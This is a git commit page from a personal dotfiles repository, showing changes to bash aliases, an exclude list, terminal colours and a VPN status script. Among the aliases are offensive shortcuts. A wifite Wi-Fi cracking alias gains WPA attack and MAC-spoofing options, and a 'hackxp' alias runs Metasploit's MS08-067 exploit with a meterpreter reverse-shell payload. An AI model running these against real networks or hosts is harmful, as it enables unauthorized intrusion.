Browse Source

aliases; nma exclude; updated vpn status

master
Robin Thoni 8 years ago
parent
commit
dfcbf68b71

+ 3
- 1
bash/bash_aliases View File

31
 alias modprobe="sudo modprobe"
31
 alias modprobe="sudo modprobe"
32
 alias wifi="sudo rfkill unblock wifi;sudo service wicd start; wicd-curses"
32
 alias wifi="sudo rfkill unblock wifi;sudo service wicd start; wicd-curses"
33
 alias stopwifi="sudo service wicd stop; rfkill block wifi"
33
 alias stopwifi="sudo service wicd stop; rfkill block wifi"
34
-alias wifite="sudo wifite -wept 10000 -wpst 10000"
34
+alias wifite="sudo wifite -wept 10000 -wpst 10000 -wpat 10000 -mac -showb"
35
 alias route="sudo route"
35
 alias route="sudo route"
36
 alias bashrc="vim ~/.bashrc; source ~/.bashrc"
36
 alias bashrc="vim ~/.bashrc; source ~/.bashrc"
37
 alias rc="vim ~/.bashrc; source ~/.bashrc"
37
 alias rc="vim ~/.bashrc; source ~/.bashrc"
97
 alias ap="rfkill unblock wifi && sudo create_ap --config /etc/create_ap.conf"
97
 alias ap="rfkill unblock wifi && sudo create_ap --config /etc/create_ap.conf"
98
 alias ns="sudo netstat -ntpa | grep LISTEN"
98
 alias ns="sudo netstat -ntpa | grep LISTEN"
99
 alias hackxp="msfconsole -x 'use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; echo set LHOST my_ip; echo set RHOST target_ip'"
99
 alias hackxp="msfconsole -x 'use exploit/windows/smb/ms08_067_netapi; set payload windows/meterpreter/reverse_tcp; echo set LHOST my_ip; echo set RHOST target_ip'"
100
+alias signal="/usr/bin/chromium-browser --profile-directory=Default --app-id=bikioccmkafdpakkkcpdbppfkghcmihk"
101
+alias slog="tail -f /var/log/syslog"

+ 2
- 0
bash/nma_exclude View File

10
 ^tail
10
 ^tail
11
 ^wifi$
11
 ^wifi$
12
 ^htop$
12
 ^htop$
13
+^py$
14
+^docker exec

+ 10
- 10
gnome-terminal/gnome-terminal/profiles/Default/%gconf.xml View File

1
 <?xml version="1.0"?>
1
 <?xml version="1.0"?>
2
 <gconf>
2
 <gconf>
3
-	<entry name="scrollback_unlimited" mtime="1463836092" type="bool" value="true"/>
4
-	<entry name="use_theme_colors" mtime="1463836092" type="bool" value="false"/>
5
-	<entry name="silent_bell" mtime="1463836092" type="bool" value="true"/>
6
-	<entry name="default_show_menubar" mtime="1463836092" type="bool" value="false"/>
7
-	<entry name="palette" mtime="1463836092" type="string">
3
+	<entry name="scrollback_unlimited" mtime="1465727790" type="bool" value="true"/>
4
+	<entry name="use_theme_colors" mtime="1465727790" type="bool" value="false"/>
5
+	<entry name="silent_bell" mtime="1465727790" type="bool" value="true"/>
6
+	<entry name="default_show_menubar" mtime="1465727790" type="bool" value="false"/>
7
+	<entry name="palette" mtime="1465727790" type="string">
8
 		<stringvalue>#2E2E34343636:#CCCC00000000:#4E4E9A9A0606:#C4C4A0A00000:#34346565A4A4:#757550507B7B:#060698209A9A:#D3D3D7D7CFCF:#555557575353:#EFEF29292929:#8A8AE2E23434:#FCFCE9E94F4F:#72729F9FCFCF:#ADAD7F7FA8A8:#3434E2E2E2E2:#EEEEEEEEECEC</stringvalue>
8
 		<stringvalue>#2E2E34343636:#CCCC00000000:#4E4E9A9A0606:#C4C4A0A00000:#34346565A4A4:#757550507B7B:#060698209A9A:#D3D3D7D7CFCF:#555557575353:#EFEF29292929:#8A8AE2E23434:#FCFCE9E94F4F:#72729F9FCFCF:#ADAD7F7FA8A8:#3434E2E2E2E2:#EEEEEEEEECEC</stringvalue>
9
 	</entry>
9
 	</entry>
10
-	<entry name="alternate_screen_scroll" mtime="1463836092" type="bool" value="true"/>
11
-	<entry name="background_color" mtime="1463836092" type="string">
10
+	<entry name="alternate_screen_scroll" mtime="1465727790" type="bool" value="true"/>
11
+	<entry name="background_color" mtime="1465727790" type="string">
12
 		<stringvalue>#2E2E34343636</stringvalue>
12
 		<stringvalue>#2E2E34343636</stringvalue>
13
 	</entry>
13
 	</entry>
14
-	<entry name="visible_name" mtime="1463836092" type="string">
14
+	<entry name="visible_name" mtime="1465727790" type="string">
15
 		<stringvalue>Default</stringvalue>
15
 		<stringvalue>Default</stringvalue>
16
 	</entry>
16
 	</entry>
17
-	<entry name="bold_color" mtime="1463836092" type="string">
17
+	<entry name="bold_color" mtime="1465727790" type="string">
18
 		<stringvalue>#000000000000</stringvalue>
18
 		<stringvalue>#000000000000</stringvalue>
19
 	</entry>
19
 	</entry>
20
-	<entry name="foreground_color" mtime="1463836092" type="string">
20
+	<entry name="foreground_color" mtime="1465727790" type="string">
21
 		<stringvalue>#FFFFFFFFFFFF</stringvalue>
21
 		<stringvalue>#FFFFFFFFFFFF</stringvalue>
22
 	</entry>
22
 	</entry>
23
 </gconf>
23
 </gconf>

+ 1
- 1
i3/i3/status/status.py View File

135
 
135
 
136
 ifaces_wireless = ["wlan0", "wlan1"]
136
 ifaces_wireless = ["wlan0", "wlan1"]
137
 ifaces_wired = ["eth0", "usb0", "br0"]
137
 ifaces_wired = ["eth0", "usb0", "br0"]
138
-ifaces_tun = [["tun0", "rthoni.com"], ["tun1", "inet"],
138
+ifaces_tun = [["tap0", "rthoni.com"], ["tun1", "inet"],
139
         ["tun2", "betaclean"]]
139
         ["tun2", "betaclean"]]
140
 
140
 
141
 for iface in ifaces_wireless:
141
 for iface in ifaces_wireless:

Loading…
Cancel
Save